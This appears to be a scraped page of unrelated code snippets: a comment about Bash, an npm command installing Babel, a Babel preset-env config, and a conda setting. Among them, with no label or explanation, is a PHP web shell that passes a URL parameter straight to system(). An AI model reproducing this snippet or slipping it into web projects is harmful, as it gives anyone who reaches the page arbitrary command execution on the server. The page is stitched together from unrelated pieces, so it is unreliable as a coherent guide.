# GNU Bash or simply Bash is a Unix shell and command language written
# by Brian Fox for the GNU Project as a free software replacement for
# the Bourne shell.
npm install --save-dev @babel/core @babel/cli @babel/preset-env
Copy
{
"presets": [
[
"@babel/preset-env",
{
"targets": {
"edge": "17",
"firefox": "60",
"chrome": "67",
"safari": "11.1"
},
"useBuiltIns": "usage",
"corejs": "3.6.5"
}
]
]
}
Copy
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
conda config --set auto_activate_base false